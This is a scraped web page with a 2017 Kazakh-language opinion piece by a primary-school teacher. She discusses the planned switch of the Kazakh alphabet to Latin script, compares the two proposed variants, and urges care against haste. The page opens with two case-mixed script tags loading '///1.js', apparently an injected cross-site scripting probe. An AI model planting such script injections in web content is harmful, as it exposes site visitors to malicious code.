<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

26.10.2017

Латын әліпбиіне көшудегі көзқарас

Ұлтымыздың тарихында 2017 жыл елеулі екі тарихи құбылыспен кірмекші. Бірі – «ЭКСПО – 17» халықаралық көрмесі болатын болса, екіншісі – Елбасы Нұрсұлтан Назарбаетың латын әліпбиіне көшу туралы ұлт тағдырына, ұрпақ болашағына, еліміздің ертеңіне тікелей байланысты жаңа бастамасы. Бұл бастаманың негізі туралы Елбасы 2012 жылдың желтоқсан айында жария еткен «Қазақстан – 2050» Стратегиясында «2025 жылдан бастап ұлттық жазуымыз латын әліпбиіне көшеді» деп анықтаған болатын. Алғашқы бетте орындалуы қиындау болып көрінген еді. Елбасының үстіміздегі жылдың сәуір айындағы Үкіметке берген тапсырмасынан кейін ерекше ықыласпен қолға алына бастады. Бүгінгі күні ресми түрде латын графикасына негізделген қазақ әліпбиінің екі нұсқасы көпшіліктің талқысына ұсынылды. Біріншісі – 25 таңба мен сегіз диграфтық символ және екіншісі – 27 таңбалық. Оның ішінде 9 – ы апостроф жүйесімен бейнеленген. Апостроф дегенге мына әріп таңбалары енген: ә/а, ғ/g, и,й/i, ң/n, ө/о, ш/s, ч/с, ұ/u, у/у үтір дәйекшелі. Адамзаттың тілі – дыбыстық тіл. Яғни, қарым – қатынас құралы дыбысқа негізделген. Басты элементарлы бірлік – дыбыс. Қазақ тілі де ұрпақтан ұрпаққа мирас ретінде беріліп келе жатқан мұра, өзіндік дыбыстық құрамы мен жүйесі бар. Әлі де ғалымдарымыз ойластырып, ұлтымыз, болашақ ұрпағымыз үшін зор маңызы бар әліпби жасауда асығыстықтар мен албырттықтарға жол бермесе екен,- деген ойымыз бар..

Аширханова Б.К.

бастауыш сынып мұғалімі

Просмотров: 574


Пікір қосу



Деректерді қолтаңбаға қосу